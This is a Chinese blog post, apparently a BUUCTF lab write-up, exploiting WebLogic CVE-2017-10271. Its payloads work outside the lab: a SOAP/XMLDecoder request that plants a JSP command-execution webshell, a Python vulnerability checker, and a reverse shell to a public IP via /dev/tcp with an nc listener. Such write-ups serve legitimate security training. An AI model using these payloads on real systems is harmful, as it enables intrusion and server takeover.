buuctf [Weblogic]CVE-2017-10271

最新推荐文章于 2022-08-05 19:07:14 发布
最新推荐文章于 2022-08-05 19:07:14 发布
阅读量668 收藏 1
点赞数
分类专栏: buuctf real 文章标签: 安全漏洞 weblogic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/115151839
版权

漏洞描述

Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器

的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。

https://blog.csdn.net/yumengzth/article/details/97522783
https://www.freebuf.com/column/203816.html

访问http://node3.buuoj.cn:26534即可看到一个404页面,说明weblogic已成功启动
在这里插入图片描述
直接访问http://node3.buuoj.cn:26534/wls-wsat/CoordinatorPortType抓包

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: node3.buuoj.cn:26534
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type:text/xml
Content-Length: 987

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/1.jsp</string>
    <void method="println">
<string>
    <![CDATA[
<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

http://node3.buuoj.cn:26534/bea_wls_internal/1.jsp?pwd=023&i=env 打印环境变量
在这里插入图片描述

python3的poc

import requests

headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Upgrade-Insecure-Requests': '1',
    'Content-Type': 'text/xml'
    }
def Webogic_XMLDecoder_poc(url):
    #url="hhttp://node3.buuoj.cn:26534"
    posturl=url+'/wls-wsat/CoordinatorPortType'
    data = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter">
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
                        <string>xmldecoder_vul_test</string></void><void method="close"/>
                    </object>
                </java>
            </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body/>
    </soapenv:Envelope>
    '''
     
    print (url)
    try:
        r=requests.post(posturl,data=data,headers=headers,timeout=5)
        geturl=url+"/wls-wsat/test.txt"
        print (geturl)
        check_result = requests.get(geturl,headers=headers,timeout=5)
        if 'xmldecoder_vul_test' in check_result.text:
            print ("[+]存在WebLogic WLS远程执行漏洞(CVE-2017-10271)")
    except:
        print ("[-]不存在WebLogic WLS远程执行漏洞(CVE-2017-10271)")

if __name__ == '__main__':
    url = "http://node3.buuoj.cn:26534"
    Webogic_XMLDecoder_poc(url)

反弹shell

公网服务器监听 nc -l -p 5555
在这里插入图片描述
post发送数据

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: node3.buuoj.cn:26534
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type:text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/159.75.72.48/5555 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述

exploitsec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weblogic 反序列化漏洞(CVE-2017-10271)检测与利用复现
文公子的博客
10-30 1566
Weblogic 反序列化漏洞(CVE-2017-10271)检测与利用复现 版权 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 漏洞环境搭建 可以参考: https://blog.csdn.net/qq_29647709/article/details/84892582 漏洞检测 检测工具下载 https://pan.baidu.com/s/1bpg3p
WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)漏洞复现
墙角睡大觉的专栏
04-25 3515
0X01 weblogic组件介绍 WebLogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JAVAEE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 WebLogic将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中...
buuctf [WebLogic]CVE-2018-2894
qq_1873822的博客
03-26 728
漏洞描述 (CVE-2018-2894)Weblogic任意文件上传 Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。 Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。 利用条件:需要知道部署应用的web目录 https:/
BUUCTF笔记(web)
m0_60716947的博客
08-05 935
进入后让我们登录网站,尝试一下,可以看到是get型,直接尝试绕过, ' 是为了闭合原本sql语句从而构成万能语句的。 给了个图片,我们f12或ctrl+u可以看到有个source.php隐藏部分所以我们在url后面加上 /source.php然后就是代码审计了。 先是下面的 if 判断,如果file传的参数不为空,为字符串,且能通过上面那些过滤就执行文件包含。所以我们这里url后加上hint.php看看提示我们在ffffllllaaaagggg文件中,然后我们在将url变成 /index前面
BUUCTF [第三章 web进阶]逻辑漏洞
m0_49025459的博客
04-21 1263
这个就很离谱,我们直接购买FLAG我们发现钱不够 但是url上显示了支付的钱和商品数,连抓包都不用,直接将这个cost修改成负的就行了
weblogic CVE-2017-10271修复教程
飞乐鸟的博客
10-30 2291
1.简介 CVE-2017-10271weblogicwls-wsat组件的一个xml反序列化漏洞,可造成远程命令执行。更详细分析可见参考链接,本文强调在进行参考链接修复中的一些细节。 2.影响版本 OracleWebLogic Server10.3.6.0.0 OracleWebLogic Server12.1.3.0.0 OracleWebLogic Server12.2.1.1.0 OracleWebLogic Server12.2.1.2.0 打了B25A及其之前版本的补丁都没用,..
Weblogic漏洞CVE -2017-10271解决方案-附件资源
03-02
Weblogic漏洞CVE -2017-10271解决方案-附件资源
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞。 CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
Weblogic CVE-2017-10271.zip
01-21
Weblogic CVE-2017-10271 是一个严重的安全漏洞,涉及Oracle WebLogic Server中的一个未经身份验证的远程代码执行漏洞。这个漏洞是由于WebLogic Server的WLS-WSDL组件处理某些请求时存在缺陷导致的。攻击者可以利用...
WeblogicCVE-2017-10271
01-03
攻击者针对WebLogicWLS组件中存在的CVE-2017-10271远程代码执行漏洞,构造请求对运行的WebLogic中间件主机进行攻击,由于该漏洞利用方式简单,且能够直接获取目标服务器的控制权限,影响范围较广,近期发现此漏洞的...
WebLogic中WLS 组件漏洞(CVE-2017-10271)专项检测工具-附件资源
03-05
WebLogic中WLS 组件漏洞(CVE-2017-10271)专项检测工具-附件资源
weblogic系列漏洞整理 ———— 3. weblogic 后台提权
Fly_鹏程万里
11-01 2018
提权思路 weblogic是一个基于JavaEE的中间件,它可以解析jsp代码,当我们知道后台密码之后,即可登陆weblogic后台,上传恶意war包,从而进行提权操作。 漏洞利用过程 登陆weblogic后台 http://192.168.11.178:7001/console,进取之后点击左侧的部署,在弹出来的右侧页面点击“安装” 在安装页面选择“上载文件”: 在 “将部署上...
CVE-2020-14882&14883weblogic未授权命令执行漏洞复现
蚁景网安学院
12-08 2288
亲爱的,关注我吧12/8本文字数2498来和我一起阅读吧本文涉及靶场知识点-CVE-2020-14882&14883 weblogic未授权访问漏洞https://www.het...
CTF writeup:tomcat上传webshell后门
samohyes的博客
07-01 5016
做了ZJU school-bus的一个题目,给了链接,***:**,在IP加端口后面写入manager/html跳出让你输密码,网上找个弱口令尝试的py文件很快就可以解出来。 tomcat:tomcat。 后面进去了网站要往上传个后门,找了好多地方没找到后门,自己写暂时水平不够,后来终于找到了一个。 https://scoperchiatore.wordpress.com/my-webshe
破解weblogic(数据库)密码
holdon521的专栏
09-01 2332
破解weblogic(数据库)密码所需步骤 注意:本例子本人以本地weblogic为列,必须已经安装weblogic 1.需要问题件 1>.数据源配置文件HKS***-****-jdbc.xml 2>.SerializedSystemIni.dat(一般情况在security目录下) 3>.weblogic.jar(自己在网上下载) 4>.WebLogicDecryptor.java(
6-10CTF夺旗入门教程--PUT漏洞
高冷的宅先生
05-04 575
1.中间件PUT漏洞介绍 中间件包括apache、tomcat、IIS、weblogic等,这些中间件可以设置支持的HTTP方法。 通过PUT请求直接上传webshell到服务器对应目录 2.信息探测 #扫描主机服务信息以及服务版本 nmap -sV 192.168.2.112 #快速扫描主机全部信息 nmap -T4 -A -v 192.168.2.112 #探测敏感信息 nikto -host...
看雪CTF web(SSRF+XML+JAR协议)
a3320315的博客
12-01 1564
题外 很久没写文章了,这儿再水一篇 正文 首先打开题目 直接有个提示,给了两个链接 根据测试第一个链接/getimage?url=https://bbs.pediy.com是远程加载图片的,而且对于url有一定的格式要求 那么我们怎么绕过这个正则呢? 这儿就需要用到一个技巧了,这儿是java环境, httpclient3和httpclient4这两个库都有容错机制,即假如端口后面存在其他字符会自动舍弃掉(/作为分隔符) 而且都会对host进行url二次解码,所以我们最终的payload为: http:/
buuctf [weblogic]cve-2017-10271
最新发布
03-10
我可以回答这个问题。buuctf [weblogic]cve-2017-10271 是一个漏洞,影响 Oracle WebLogic Server,可以允许攻击者远程执行代码。建议用户及时更新补丁以保护系统安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值